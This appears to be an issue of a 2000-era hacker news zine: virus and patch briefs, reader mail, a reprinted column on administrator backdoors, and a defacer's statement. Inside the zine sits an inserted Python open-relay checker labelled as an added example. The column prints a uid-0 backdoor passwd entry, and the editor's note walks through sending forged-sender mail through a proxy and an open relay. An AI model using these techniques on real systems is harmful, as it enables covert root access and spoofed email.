The Linux software distributor pays an estimated $850 million in stocks and
cash for the network of tech-info sites, which includes the esteemed Slashdot.

++ Thumbs Down on Net Wiretaps (Politics 3:00 a.m. PST)
http://www.wired.com/news/politics/0,1283,34055,00.html?tw=wn20000203
The controversy about Internet wiretaps -- which pitted the FBI and the FCC
against the ACLU and the EFF -- has ended with a recommendation against online
surveillance. Declan McCullagh reports from Washington.

++ Copy-Protected CDs Taken Back (Technology 3:00 a.m. PST)
http://www.wired.com/news/technology/0,1282,33921,00.html?tw=wn20000203
BMG Germany pulls the plug on its first effort to protect CDs from piracy after
customers complain that some of the music is unplayable. By Chris Oakes.

++ Moveable Media: Stick or Card? (Technology 3:00 a.m. PST)
http://www.wired.com/news/technology/0,1282,34052,00.html?tw=wn20000203
A new industry consortium thinks it has the portable answer to secure storage
of music and more: a secure digital memory card. Microsoft signed on Wednesday.
Look out, Sony Memory Stick.

++ Net Tax May Get the Heave-Ho (Politics Wednesday)
http://www.wired.com/news/politics/0,1283,34075,00.html?tw=wn20000203
It's a matter of changing one sentence in existing legislation. But if Congress
approves, the threat of Internet taxation could vanish forever. Or at least for
Washington's idea of forever. Declan McCullagh reports from Washington.

++ Class-Action Suit Calls on AOL (Politics Wednesday)
http://www.wired.com/news/politics/0,1283,34063,00.html?tw=wn20000203
A lawsuit alleges America Online's newest software disconnects users from
competing online accounts. The filing requests $8 billion in damages for
version 5.0 users.
++ RealNetworks Helps Pay Piper (Technology Wednesday)
http://www.wired.com/news/technology/0,1282,34026,00.html?tw=wn20000203
The Net's streaming media giant adds technology from AudioSoft to facilitate
royalty payments to copyright holders. The system will count streams and send
the data to the collecting agency. By Christopher Jones.

++ Virtual Training for Real Jobs (Culture Wednesday)
http://www.wired.com/news/culture/0,1284,33897,00.html?tw=wn20000203
Technology may be the cornerstone of the new economy, but people lacking skills
are being shut out of the market. One Texas program is trying to get them into
the game. Katie Dean reports from Austin, Texas.

++ But, How to Pronounce Dot EU? (Politics Wednesday)
http://www.wired.com/news/politics/0,1283,34045,00.html?tw=wn20000203
The European Commission, wanting a piece of the dot com pie, launches an
initiative to give businesses on the other side of the pond a uniform suffix.

-=- Security Portal News Shorts -=-

++ Trend Micro Virus Alerts: TROJ_FELIZ and W97M_ARMAGID.A
<http://www.antivirus.com/vinfo/>
- a Windows executable and Word macro virus respectively, both are low risk
viruses, not believed to be widespread

++ ComputerWorld: Y2K gives some admins a security education
<http://www.computerworld.com/home/print.nsf/all/000101D96E>
- The threat of online assaults had IT staffs on guard, but midnight came and
went without any serious security problems cropping up, according to experts
monitoring systems

++ ZDNet: Script virus looks to ring in new year
<http://www.zdnet.com/zdnn/stories/news/0,4586,2415783,00.html?chkpt=zdnntop>
- The first virus to get its own press release in the year 2000 appears to be
little more than a nuisance. Meanwhile, pirate-killer Trojan.Kill also quiet

++ Jan 1, 2000

Symantec: PWSteal.Trojan Virus
<http://www.symantec.com/avcenter/venc/data/pwsteal.trojan.html>
- PWSteal.Trojan is a trojan which attempts to steal login names and passwords.
These passwords are often sent to an anonymous email address

CNN: CA warns of Y2K-triggered virus
<http://cnn.com/1999/TECH/computing/12/31/ca.virus.y2k/index.html>
- CA said the "Trojan.Kill_Inst98" virus will delete all the files on an
infected PC's C: drive when the system clock rolls over to Jan. 1, 2000

++ Dec 31, 1999

NAI: Zelu Virus
<http://vil.nai.com/vil/dos10505.asp>
- This is an MS-DOS executable which can destroy data on the hard drive. The
original filename as received to AVERT is Y2K.EXE and is 24,944 bytes in size.
If this file is run, it simulates checking the system for Y2K compliancy. It is
not however doing any such thing - it is trashing files on the local system
rendering the machine inoperable. Not believed to be widespread.

Y2K Status Update
<http://securityportal.com/topnews/y2k19991231-jwr-10.html>
- no news is good news

++ Sophos Virus Alert: WM97/Chantal-B
<http://www.sophos.com/virusinfo/analyses/wm97chantalb.html>
- WM97/Chantal-B is a Word macro virus which drops a batch file virus and a
Visual Basic script trojan horse. On the 31st of any month the virus displays
the Microsoft Office assistant with the message: "Y2K is Coming Soon". If the
year is 2000 the virus attempts to delete all files in the current directory
and in the root directory of the C: drive

Sophos Virus Alert: WM97/BackHand-A
<http://www.sophos.com/virusinfo/analyses/wm97backhanda.html>
- If the date is Friday the 13th the virus password protects the document with
the password "Trim(Two)".
Then, if the year is 2000, it resets the computer's date to 1/1/1980

++ CERT: Estimate of the Threat Posed by Y2K-Related Viruses
<http://www.cert.org/y2k-info/virus_threat_est.html>
- About a dozen Y2K-related viruses have been reported, but they are not
widespread. Moreover, because viruses have to be executed to operate and
because most people will not be at their keyboards as the date rolls over, the
likelihood of a significant virus event is low. As people return to work next
week, the virus risk may increase somewhat for all types of viruses, but there
is no reason to expect a major outbreak.

NAI Virus listing: ExploreZip.C or Minizip III
<http://vil.nai.com/vil/wm10493.asp>
- This is another variant of the original W32/ExploreZip.worm distributed
earlier in 1999. This version is different in that it is "localized" with
Spanish error messages however will function on English Windows systems. This
edition was compressed using another compression tool. Not currently rated as
a high risk threat

++ Dec 30, 1999

ZDNet: Apple's OS 9 patch brings new problems
<http://www.zdnet.com/zdnn/stories/news/0,4586,2415488,00.html?chkpt=zdhpnews01>
- Although many users were impressed by Apple's quick reaction this week to the
discovery of a potential security flaw in Mac OS 9, those users who have
applied the new OT Tuner 1.0 patch are reporting loss of all network
connectivity or crashes during startup.
Apple says patched machines simply need to be restarted

++ Sun Security Bulletin 192: CDE and OpenWindows
<http://securityportal.com/topnews/sun19991230-192.html>
- Sun announces the release of patches for Solaris 7, 2.6, 2.5.1, 2.5, 2.4, 2.3
(SunOS 5.7, 5.6, 5.5.1, 5.5, 5.4, 5.3), and SunOS 4.1.4, and 4.1.3_U1 which
relate to various vulnerabilities in CDE and OpenWindows

Sun Security Bulletin 191 sadmind
<http://securityportal.com/topnews/sun19991230.html>
- Sun announces the release of patches for Solaris 7, 2.6, 2.5.1, 2.5, 2.4, and
2.3 (SunOS 5.7, 5.6, 5.5.1, 5.5, 5.4 and 5.3), which relate to a vulnerability
with sadmind

Thanks to myself for providing the info from my wired news feed and others from
whatever sources, Zym0t1c and also to Spikeman for sending in past entries....
- Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

========================================================================

The message board is DEAD; it was an experiment that failed. Perhaps I'll
revive a board when I can run some good board software on our own host.

Don't be shy with your email. We do get mail, just not much of it directed to
other readers/the general readership. I'd really like to see a 'readers mail'
section. Send in questions on security, hacking, IDS, general tech questions or
observations etc. Hell, we've even printed poetry in the past when we thought
it was good enough to share.. - Ed

=======================================================================

Seen on security focus:

To: Security Jobs
Subject: Virus coder wanted
Date: Thu Jan 27 2000 00:18:44
Author: Drissel, James W.
Message-ID: <CD11F9F59C6BD3118BF5009027B0F53B0884EC@adp-exch-1.cmet.af.mil>

Computer Sciences Corporation in San Antonio, TX is looking for a good virus
coder. Applicants must be willing to work at Kelly AFB in San Antonio. Other
exploit experience is helpful.
Send Resumes/questions to james.drissel@cmet.af.mil

-=-

From: <pyr0-phreak@geeks404.com>
To: <hwa@press.usmc.net>
Sent: Wednesday, January 05, 2000 1:02 AM
Subject: Just some comments

Hello staff of HWA,

Just thought i would tell u guys that u r doin a pimp ass job and if its
alright i would like to put a link up on my webpage to this interesting and
informative site. Mail me back plez.

Pyr0-phreak@geeks404.com
www.crosswinds.net/~pyr0phreak

-=-

From: Andrew Nutter-Upham <nutterupham@earthlink.net>
To: <hwa@press.usmc.net>
Sent: Sunday, January 02, 2000 9:42 PM
Subject: about your site.

I love the newsletter, read every edition. but your site sucks. now i don't
blame you, a lot of people have problems with good site design. I do web design
as a part time job, and I'd like (just to be nice, for money of course.) to
redo the site, if that's ok with you, I could leach the site down, but i think
it'd be easier if you could just zip it up and send it to me. if you like my
revisions feel free to keep them. if not, that's ok too, i just thought that
I'd put in the offer. Think it over. thanks for listening.

-andy

It sure does suck; it's getting pretty shoddy and outdated looking, a tad
ragged around the edges. I've done some minor patch-up mods to make things
better but don't have time to work on it in a major way. Perhaps we can get
something going here... - Ed

-=-
From: Lascarmaster <Lascars@iquebec.com>
To: <CRUCIPHUX@DOK.ORG>
Sent: Monday, January 24, 2000 1:58 AM
Subject: [ AD! ]

Hello CRUCIPHUX, hello from France

my site is a french hacker portal with some good links and news for hackers
( in french i prefer the word lascar )

by the way , if you could place this ad on your next hwa.hax0r digest, it could
be very nice

try my site at http://lascars.cjb.net

______________________________________________________________
French Hackers' Portal / Le Portail Des Lascars Francophones
Links and News of interest / Liens et news pour lascars. ;-)
--------------------------------------------------------------
->->->->->->->->-> http://lascars.cjb.net <-<-<-<-<-<-<-<-<-
______________________________________________________________

The Lascars portal is http://Lascars.cjb.net
Lascarmaster mailto:Lascars@iquebec.com

______________________________________________________________________________
If your email were on iFrance you could listen to this message by phone!
http://www.ifrance.com : don't leave your emails far from you any more ...
free on iFrance: emails (20 MB, POP, FAX), calendar, personal site

-=-
From: Dragos Ruiu <dr@v-wave.com>
To: <cc: list omitted>
Sent: Tuesday, January 25, 2000 9:50 PM
Subject: kyxspam: IMxploits in the news

(First reported in Salon huh.?... Bay Area tunnel vision is an interesting
phenomenon. Has anyone made the definitive IM vulnerability and exploit page
yet? As in I'M owned. --dr :-)

Hack Takes Aim at AOL Clients
Wired News Report
5:30 p.m. 24.Jan.2000 PST

A security breach on AOL Instant Messenger put the privacy of AIM users at risk
on Monday, according to a published report.

The breach, first reported in Salon, allows subscribers to link new AOL
accounts to AIM names that already exist. Holes in the sign-up process allow
people to get around the password protection of the AIM accounts.

"We are aware of it and are deploying security measures to defeat it," said
Rich D'Amato, a spokesman for AOL.

AOL's online service is used to change passwords, so hackers are easily able
to open new accounts using the existing AIM user's name.

People who subscribe to AOL are not affected by the breach. People who use
instant messaging software (AIM) outside of AOL, are.

D'Amato called the security breach an example of "hacker behavior that crosses
the line into illegal action."

"Our intention is to investigate this and when we identify an individual or
groups of individuals, we intend to bring this to the attention of the proper
law enforcement authorities," D'Amato said.

He declined to speculate on when the problem will be fixed or how many users
were affected, although he characterized it as "a very small number."

David Cassel, who edits the AOL Watch mailing list, claimed the security hole
was easily preventable. It was simply a matter of someone thinking through the
sign-on process.

"AOL left a gaping hole in the way they implemented it," Cassel wrote in an
email. "Those who happened to have an AOL account weren't vulnerable, but
everyone else was.
To promote such an easily cracked software really violates any reasonable
expectation of security. In that sense, all AIM users were affected."

"AOL is a marketing company, not a technology company," Cassel wrote. "They
mass-promoted a software that's vulnerable to easy attacks."

--
kyx.net we're from the future - home of kanga-foo!

-=-
From: Dragos Ruiu <dr@v-wave.com>
To: <cc: list omitted>
Sent: Tuesday, January 25, 2000 10:32 PM
Subject: kyxspam: hacking for politics.

http://news.cnet.com/news/0-1005-200-1531134.html?tag=st.ne.ron.lthd.1005-200-1531134

Hackers attack Japanese government sites
By Reuters
Special to CNET News.com
January 25, 2000, 11:40 a.m. PT

TOKYO--Japanese officials suffered an embarrassment today when hackers
penetrated two government Web sites, leaving a message in one of them
criticizing the Japanese government's position on the 1937 Nanjing Massacre.

Computer systems at Japan's Management and Coordination Agency were raided
yesterday, and its home page was replaced with derogatory messages insulting
the Japanese in the first-ever hacking of the country's government computer
system.

The hackers left a message on the Web site in Chinese blasting the Japanese
government for refusing to acknowledge that the Nanjing Massacre took place,
media reports said.

Jiji news agency said it had deciphered the message, which originally came in
garbled, to read: "The Chinese people must speak up to protest the Japanese
government for refusing to acknowledge the historical misdeed of the 1937
Nanjing Massacre."

Hundreds of thousands of civilians were massacred by Imperial Army troops
during the 1937-38 occupation of the central Chinese city.

A meeting by ultrarightist Japanese in Osaka last weekend to whitewash the
incident, also called the Rape of Nanking, has whipped up new anger in China,
where hundreds marched through the streets of Nanjing to denounce the
conference.

The Chinese government lodged protests about the gathering. But the Japanese
government, which acknowledges that the incident was no fabrication as some
ultrarightists claim, failed to bar the group from holding the weekend meeting.

A similar hacking incident occurred on Japan's Science and Technology Agency's
home page.
Agency officials declined to give details of the messages but said the home
page was also replaced with a direct access switch to adult magazine Web sites.

Top government spokesman Mikio Aoki said the government would launch an
extensive investigation into the hacking incidents, including possible help
from Washington, which is more advanced in dealing with hackers.

"The government must take all necessary measures including seeking help from
the United States," Aoki said at a news conference.

Officials said it was not immediately clear whether the same hacker was
responsible for the two separate cases of infiltration.

Story Copyright © 2000 Reuters Limited. All rights reserved.

--
kyx.net we're from the future - home of kanga-foo!

-=-
From: Dragos Ruiu <dr@v-wave.com>
To: <cc: list omitted>
Sent: Wednesday, January 26, 2000 5:15 PM
Subject: kyxspam: who watches the watchmen?

(tip o'de hat to rfp's site {wiretrip.net} that had this article link. Luv dem
skins... --dr)

http://www.sunworld.com/sunworldonline/swol-01-2000/swol-01-security.html

Who gets your trust?
Security breaches can come from those you least suspect

Summary
Systems administrators have extraordinary access to all the data on corporate
systems. What can be done to ensure that your administrators will not betray
that trust?

WIZARD'S GUIDE TO SECURITY
By Carole Fennelly

In the business world you will often hear the statement "We don't hire
hackers." When pressed for a reason, the speaker usually reveals a fear that a
"hacker" will install a back door in the system. Time and time again, however,
I have seen back doors installed by employees or security professionals whose
integrity is never questioned. When confronted, they usually say it's no big
deal. After all, they have the root password. They just wanted to set up a root
account with a different environment. That's not hacking, right?

Wrong. Their intention did not matter -- the security of the system has been
bypassed.

This article discusses how administrative privileges can be abused and suggests
some methods for countering that abuse. It is not meant to imply that every
administrator abuses privileges or has malicious intent -- just that you
shouldn't assume anything.

What is a back door?

Quite simply, a back door is a method for gaining access to a system that
bypasses the usual security mechanisms. (Has everyone seen WarGames?)
Programmers and administrators love to stick back doors in so they can access
the system quickly to fix problems. Usually, they rely on obscurity to provide
security. Think of approaching a building with an elaborate security system
that does bio scans, background checks, the works.
Someone who doesn't have time to go through all that might just rig up a back
exit so they can step out for a smoke -- and then hope no one finds out about
it.

In computer systems, a back door can be installed on a terminal server to
provide direct access to the console remotely, saving the administrator a trip
to the office. It can also be a program set up to invoke system privileges from
a nonprivileged account.

A simple back door is an account set up in the /etc/passwd file that looks like
any other userid. The difference is that this userid doesn't have to su to root
(and it won't show up in /var/adm/sulog) -- it already is root:

    auser:x:0:101:Average User :/home/auser:/bin/ksh

If you don't see it, look again at the third field (userid) and compare it to
the root account. They are the same (0). If you are restricting direct root
logins to the console only (via /etc/default/login), then this account will
have the same limitation. The difference is that if someone does su to this
account, it will not be apparent in /var/adm/sulog that it is root. Also, a
change to the root password will not affect the account. Even if the person who
installed the account intends no harm, he or she has left a security hole.

It is also pretty common for an administrator to abuse the /.rhosts file by
putting in desktop systems "temporarily." These have a way of becoming
permanent. Back doors can also be set up in subtler ways through SUID 0
programs (which set the userid to root).

Usually, the motivation for setting up back doors is one of expediency. The
administrator is just trying to get a job done as quickly as possible. Problems
arise later when either (1) he leaves under normal circumstances and the hole
remains or (2) he leaves under bad circumstances and wants revenge.

Proprietary data

A manager may also be reluctant to hire "hackers" for fear that they may
divulge proprietary information or take copies of proprietary data.
Several years ago, I was consulting at a company when a new administrator
joined the group. In an effort to ingratiate himself with the team, he confided
that he had kept the backup tapes from his old job (a competitor) and that they
had some "really cool tools." It so happened that a consultant with my own
business worked at the competitor's site. A scan of the tape revealed the
proprietary software that the administrator had been working on, which
eventually sold for a significant amount of money. While the admin probably did
not intend to steal the software, his actions could have left his new employer
facing a large lawsuit -- all for the sake of a few shell scripts.

In this particular case, no one believed that the administrator had any
ulterior motives. I wonder if people would have felt that way if he had been a
"known hacker"?

System monitoring

Administrators are supposed to monitor system logs. How else can problems be
investigated? But there is a difference between monitoring logs for a
legitimate reason and monitoring them to satisfy prurient curiosity. Using the
system log files to monitor a particular user's behavior for no good reason is
an abuse of privileges.

What is a good reason? Your manager asks you to monitor specific logs. Or maybe
you notice suspicious activities, in which case you should inform the
management. Or, more commonly, a user complains about a problem and you are
trying to solve it.

What is a bad reason? A user ticks you off and you want to see how he is
spending company time. Or a user has a prominent position in the company and
you want to know what kinds of Websites she goes to.

Countermeasures

You can take some actions to ensure the integrity of privileged users, but none
of them carries any guarantee.

Background checks

You can have an investigative agency run a background check on an individual
and you can require drug tests. These tell you only about past behavior (if the
individual has been caught).
The state of New Jersey (where I live) has adopted a law commonly referred to
as Megan's Law (see Resources). The law mandates that a community be notified
of any convicted sex offender living in the community. On the surface, it
sounds like a great idea and a way to protect children from predators. As a
parent, I am particularly sensitive to crimes against children. I received a
Megan's Law notification this past year about a convicted sex offender who
moved into town. It did not change a thing for me. My feeling is that every
child molester has to have had a first time and that in any case not all
molesters have been identified. Therefore, I take appropriate precautions with
my children, regardless of who has moved to the area.

In the technical field, hackers are considered the molesters. (Yes, I know all
about the politically correct terms cracker, defacer, etc., but the common term
these days is hacker.) How do you know if someone is a "hacker"? Some people
try to refine the term to mean "someone who has been convicted of a computer
crime." But let's say, for example, that you attend Defcon, the hackers'
conference, and encounter an intelligent job seeker with bright blue hair and
funky clothes. Would you hire him? Chances are that you would at least
scrutinize his credentials and make sure your contract spelled out all details
of the work to be performed and the legal repercussions for any violations.
What if the same person showed up for an interview with the blue dye rinsed out
and in a nice pressed suit? Be honest: would you perform the same background
checks regardless of a person's appearance?

Technical measures

Some technical software packages can limit or control superuser privileges. I
recommend using them to prevent the inadvertent abuse of superuser privilege.
Unfortunately, knowledgeable administrators and programmers with privileged
access will be able to circumvent these measures if they really want to.
sudo

The freely available sudo package provides more granular control over the
system by restricting which privileged commands can be run on a user basis. See
Resources for the Sudo main page, which has a more complete description.

Tripwire

Tripwire is a file integrity package that, following the policy determined by
the administrator, reports any changes made to critical files. Tripwire was
originally developed at Purdue University by Gene Kim under the direction of
Eugene Spafford. I plan to evaluate the merits of the commercial version of
Tripwire in a future column.

Tripwire is a good way for an administrator to tell whether the system files or
permissions have been modified. What can be done, however, if the senior
administrator who monitors the system has malicious intent?

Professionalism

The best defense against the abuse of administrator privileges is to rely on a
certain level of professionalism. The medical Hippocratic oath includes the
mandate Do No Harm. While there is no such professional oath for systems
administrators, you can establish guidelines for acceptable behavior.

During the mid-1980s, I worked as an administrator in a computer center at a
large telecommunications research facility. We had a code of ethics that a user
had to sign before an account could be installed. We also had a code of ethics
for privileged users that included additional restrictions, such as:

  - No SUID 0 (set userid to root) programs will be installed without the
    consent, in writing, of the senior administrator.

  - All users' email is to be considered private and confidential and may not
    be read by anyone other than the intended recipient.

  - Users' files may not be modified or read except in the case of a
    predetermined problem or security investigation. Be prepared to justify.

  - Privileged users are often entrusted with sensitive information, such as an
    employee termination, before other employees. This information is to be
    kept confidential.
  - The root passwords are changed monthly and are to be distributed by the
    senior administrator only. The passwords must be kept in a safe location,
    such as your wallet. If the password is lost, notify the senior
    administrator or your manager immediately.

  - Keystroke monitoring of user activities is strictly prohibited without
    senior management approval, in writing.

  - All administrative procedures and tools are to be considered proprietary
    information and are the property of the computer center.

  - Tape archives may not be removed from the facility without written
    approval.

Discretion

A code of ethics for privileged users should not be considered a punitive
device, but rather a statement about the integrity of the person who signs it.

At one point during my years in the computer center, the secretary to the
president of the company came to me with a printer problem. As I was assisting
her, she became upset when she realized that the test job she had sent to the
printer was highly confidential. I was able to reassure her that all
administrators were bound by a code of ethics and would be terminated for
violations. (Besides, I wasn't really reading it, I was just looking for
garbage characters!)

Professionals must establish a certain level of trust. This is especially
important for those privy to sensitive information regarding terminations or
investigations.

Final thoughts

Would I hire someone who showed up for an interview with blue hair, body
piercings, and a name like 3v1l HaK0rZ? No. Not because he might install a back
door, but because he was ignorant about what was acceptable on Wall Street.

As for the back doors? More are installed by well-groomed "professionals" in
suits than by "hackers." Anyone with the required skills can be either a
"security consultant" or a "hacker." The only difference is the label.

Disclaimer: The information and software in this article are provided as-is and
should be used with caution.
Each environment is unique, and readers are cautioned to investigate, with their companies, the feasibility of using the information and software in this article. No warranties, implied or actual, are granted for any use of the information and software in this article, and neither the author nor the publisher is responsible for any damages, either consequential or incidental, with respect to the use of the information and software contained herein.

About the author

Carole Fennelly is a partner in Wizard's Keys Corporation, a company specializing in computer security consulting. She has been a Unix system administrator for almost 20 years on various platforms and of late has focused on sendmail configurations. Carole provides security consultation to several financial institutions in the New York City area.

-- kyx.net we're from the future - home of kanga-foo!

-=-

02.0 From the editor.
~~~~~~~~~~~~~~~~

[Editor's Soapbox]

#include <stdio.h>
#include <thoughts.h>
#include <backup.h>

main()
{
    printf ("Read commented source!\n\n");

    /*
     * Yes we've wavered from our weekly release schedule, sorry
     * about that, I've been indulging in other projects requiring
     * more of my time (network IDS related etc) but you will find
     * pretty much full coverage of the time period Jan 16th to Feb
     * 12th or so included in this issue.
     *
     * I've rearranged stuff a little, I've moved some of the fodder
     * that I'm sure was annoying some people and definitely at
     * least one (grin) to the END of the newsletter, into the
     * appendices where it should probably have been in the first
     * place.
     * So if you're looking for the gov and mil sites that
     * have scoured our site or want to check the FAQ or our source
     * or resource lists etc, they have all been moved to the back
     * so now you can more or less 'dive in' to the news material
     * and content without paging thru stuff you may have already
     * seen a million times.
     *
     * Also did a slight modification/clean up of the website, it's
     * going to be redone but meanwhile I've made it a little less
     * cumbersome and easier to navigate. Also added a toy or two,
     * want a user@hax0r-news.zzn.com mail address? I knew you did
     * (heh) well now you can, just follow the link and away you
     * go to yet another web based mail account...sorry appears to
     * be no forwarding. <beh>
     *
     * This will include a lot of HNN rehashed material, I'm working
     * on automating the retrieval of certain news sources for time
     * saving in creating these issues, since we have access to
     * other sources of info that don't get explored as often as
     * I'd like, also keeping up with exploits is not so difficult
     * now that packetstorm no longer has the contact base it once
     * did. If you can suggest sites that get 0-day (grin) or current
     * exploit code or the sites of the coders themselves, please
     * send in the url/list info etc so we can keep everyone up to
     * date.
     *
     * I shall finally be asking some help from people, I can no
     * longer do this by myself to my satisfaction, so I hope to
     * enlist some eager beavers with time to kill on this project
     * rather than let release dates drift further and further
     * apart.
     *
     * Things are a bit messy and not necessarily in chronological
     * order, I don't like it but that's the way it turned out, I
     * really need to spend more time on this to get it organized
     * more neatly and make it more accessible, comments welcome.
     *
     * We need more submissions! If you submit to security NGs or
     * mailing lists about exploits or security concerns that you
     * think may be of interest to our readers, consider CC:ing a copy
     * to me for inclusion here. I try and cover a broad spectrum
     * (perhaps too broad) of security/hacker related material and
     * as such a little help with material would be most appreciated.
     *
     * Mucho props out to Zym0t1c who is contributing more and more
     * to the zine lately, thanks dude!
     *
     * Cruci
     *
     * cruciphux@dok.org
     * Preferred chat method: IRC EFnet in #HWA.hax0r.news
     *
     */

    printf ("EoF.\n");
}

Snailmail:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

Anonymous email:

telnet (wingate ip)   (see our proxies list)
Wingate>0.0.0.0
Trying 0.0.0.0...
Connected to target.host.edu
Escape character is '^]'.
220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST)
HELO bogus.com
250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you
MAIL FROM: admin@nasa.gov
250 admin@nasa.gov... Sender ok
RCPT TO: cruciphux@dok.org
250 cruciphux@dok.org... Recipient ok
DATA
Secret cool infoz
.
QUIT

If you got that far everything is probably ok, otherwise you might see

550 cruciphux@dok.org... Relaying denied

or

550 admin@nasa.gov... Domain must exist

etc.

* This won't work on a server with up-to-date rule sets denying relaying, and your attempts will be logged, so we don't suggest you actually use this method to reach us. It's probably also illegal (theft of service) so, don't do it. ;-)

-=-

Congrats, thanks, articles, news submissions and kudos to us at the main address:

hwa@press.usmc.net

Complaints and all nastygrams and mai*lbombs can go to /dev/nul; nukes, synfloods, trinoo and tribe or ol' papasmurfs to 127.0.0.1; private mail to cruciphux@dok.org

danke.

C*:.
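The relay session in the editor's note is also the test a mail administrator should run against their own server. Below is an added example, not from the zine or from sendmail, that replays the HELO / MAIL FROM / RCPT TO dialogue against a constructed stand-in for the target MTA and classifies the answer. The hostname, the bogus.com / admin@nasa.gov / cruciphux@dok.org addresses and the 550 reply texts are taken from the transcript; the stand-in's rule set (which domains it considers local, whether it relays, which sender domains "exist") is an assumption made so the exchange runs offline. The probe deliberately stops after RCPT TO and never issues DATA, so nothing is delivered even when the server turns out to relay for anyone.

```python
"""Open-relay probe modeled on the telnet session above (added example, not from the zine).

FakeSendmail is a constructed stand-in for the target MTA so the dialogue runs offline;
its rule set (local domains, whether it relays, which sender domains exist) is assumed.
"""
import re

ADDR_RE = re.compile(r"<?([^<>\s:]+@[^<>\s]+)>?")


def parse_address(arg):
    """Extract user@host from 'FROM:<a@b>', 'FROM: a@b' or 'TO:<a@b>'; None if absent."""
    m = ADDR_RE.search(arg)
    return m.group(1) if m else None


class FakeSendmail:
    """Minimal SMTP state machine imitating the Sendmail 8.9.3 replies in the transcript."""

    def __init__(self, hostname, local_domains, relay_allowed, known_domains=()):
        self.hostname = hostname
        self.local_domains = {d.lower() for d in local_domains}
        self.relay_allowed = relay_allowed           # True models the open relay in the transcript
        self.known_domains = {d.lower() for d in known_domains} | self.local_domains
        self.check_sender = bool(known_domains)      # models a "Domain must exist" rule set
        self.helo = None
        self.sender = None
        self.in_data = False

    def banner(self):
        return f"220 {self.hostname} ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST)"

    def request(self, line):
        if self.in_data:                             # collecting the message body
            if line == ".":
                self.in_data = False
                return "250 Message accepted for delivery"
            return ""                                # body lines get no reply
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "HELO":
            self.helo = arg
            return f"250 {self.hostname} Hello {arg}, pleased to meet you"
        if self.helo is None:
            return "503 Polite people say HELO first"
        if verb == "MAIL":
            addr = parse_address(arg)
            if addr is None:
                return "501 Syntax error in parameters"
            if self.check_sender and addr.rsplit("@", 1)[1].lower() not in self.known_domains:
                return f"550 {addr}... Domain must exist"
            self.sender = addr
            return f"250 {addr}... Sender ok"
        if verb == "RCPT":
            if self.sender is None:
                return "503 Need MAIL before RCPT"
            addr = parse_address(arg)
            if addr is None:
                return "501 Syntax error in parameters"
            if addr.rsplit("@", 1)[1].lower() in self.local_domains or self.relay_allowed:
                return f"250 {addr}... Recipient ok"
            return f"550 {addr}... Relaying denied"
        if verb == "DATA":
            self.in_data = True
            return '354 Enter mail, end with "." on a line by itself'
        if verb == "RSET":
            self.sender = None
            return "250 Reset state"
        if verb == "QUIT":
            return f"221 {self.hostname} closing connection"
        return "500 Command unrecognized"


def probe_relay(mta, helo="bogus.com", mail_from="admin@nasa.gov", rcpt_to="cruciphux@dok.org"):
    """Replay the transcript up to RCPT TO and classify the reply.

    rcpt_to must be in a domain the server is not authoritative for; a 250 there means it
    relays for anyone. The probe never issues DATA, so nothing is delivered.
    """
    transcript = ["S: " + mta.banner()]

    def step(cmd):
        reply = mta.request(cmd)
        transcript.append("C: " + cmd)
        transcript.append("S: " + reply)
        return reply

    reply = step(f"HELO {helo}")
    if not reply.startswith("250"):
        verdict = "helo rejected"
    else:
        reply = step(f"MAIL FROM:<{mail_from}>")   # RFC 821 form; old sendmail also took the spaced form
        if not reply.startswith("250"):
            verdict = "sender rejected"
        else:
            reply = step(f"RCPT TO:<{rcpt_to}>")
            if reply.startswith("250"):
                verdict = "open relay"
            elif reply.startswith("5"):
                verdict = "relaying denied"
            else:
                verdict = "undetermined"
    step("QUIT")
    return verdict, transcript


if __name__ == "__main__":
    for relays in (True, False):
        verdict, lines = probe_relay(FakeSendmail("target.host.edu", {"target.host.edu"}, relays))
        print("\n".join(lines), "\n=>", verdict, "\n")
```

To run this against a real server, swap FakeSendmail for an object whose banner() and request() read and write a line-oriented, CRLF-terminated socket; the classification logic does not change. Probe only hosts you are responsible for: the editor's warning about logging and theft of service applies to the script just as much as to the telnet session.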
-= start =--= start =--= start =--= start =--= start =--= start =--= start

[Content Start]

-= start =--= start =--= start =--= start =--= start =--= start =--=

03.0 Slash, Croatian cracker, speaks out
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following is from one of the last defacements that Slash has done; he has since renounced defacing and is starting a new security group called b0f (Buffer Overflow). We'll keep you posted as this develops. - Ed

Defaced by slash [ 2.1.2000 ]

Original site here (http://www.attrition.org/mirror/attrition/2000/01/08/www.badjura-petri.com/index-old.html)

www.badjura-petri.com

- I got some interesting mail in the last few days that I want to share with You. The first one is from a Security Consultant David Hove, who works for a company named "RISCmanagment Inc." (www.riscman.com), and this is what he wrote to me in his mail:

------
Numb Nuts,

Your judgments lay upon broken young souls who know no better. Let it be! Hackers will hack regardless of holes previously exploited. If the sys adm does not fix their holes this is not the issue. Hacking for fame is not the issue. You yourself mailed your hack in for recognition did you not. STOP THE HYPOCRISY AND SIMPLY HACK. Who the hell are U to dictate what should be placed on a defaced website? I personally work the other side of the fence specializing in keeping you out but thoroughly enjoy watching you and others like you go about your daily routine. Exploiting port 80, buffer overflows, running your little scripts, etc. Fuck ethics! The harder you try to hack the more aware we become as admins. For those admins who do not keep up Fuckem!

David Hove
Security Consultant CCSA/CCSE
RISCmanagement Inc.
www.riscman.com
-------

Dear Mr.
David, your email made me very sad because I realized that people don't get the message I'm trying to say. Hacking previously hacked sites is considered lame, and yes, hacking for fame is the issue. Hackers nowadays hack only to get media attention. In my country a 16 year old Back Orifice user was raided for "hacking" the computer of a Croatian politician. The media made a national hero out of him. In the interview he said that he could hack into a bank with just two of his friends and a good computer. Now, people who read that newspaper bought the story, but people who know young Denis via IRC can confirm that he is a complete idiot and a lamer. His parents are so proud of him, not knowing that anyone can "hack" using Back Orifice.

